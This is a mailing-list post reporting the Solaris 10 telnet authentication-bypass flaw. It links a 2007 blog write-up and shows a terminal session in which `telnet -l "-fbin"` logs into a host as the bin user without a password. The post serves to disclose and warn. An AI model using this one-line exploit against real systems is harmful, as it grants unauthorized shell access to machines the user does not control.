Solaris 10 Telnet Exploit

• Previous message (by thread): death of the net predicted by deloitte -- film at 11
• Next message (by thread): Solaris 10 Telnet Exploit
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day- 
disable.html

Tested on Sol10, and it indeed works... Good thing we use SSH, right?!

################################
iWil:~ wschultz$ telnet -l "-fbin" dns1
Trying A.B.C.D...
Connected to dns1.my.com.
Escape character is '^]'.
Last login: Sun Feb 11 18:11:05 from A.B.C.D
Sun Microsystems Inc.   SunOS 5.10      Generic January 2005
$ id
uid=2(bin) gid=2(bin)
$
################################

• Previous message (by thread): death of the net predicted by deloitte -- film at 11
• Next message (by thread): Solaris 10 Telnet Exploit
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]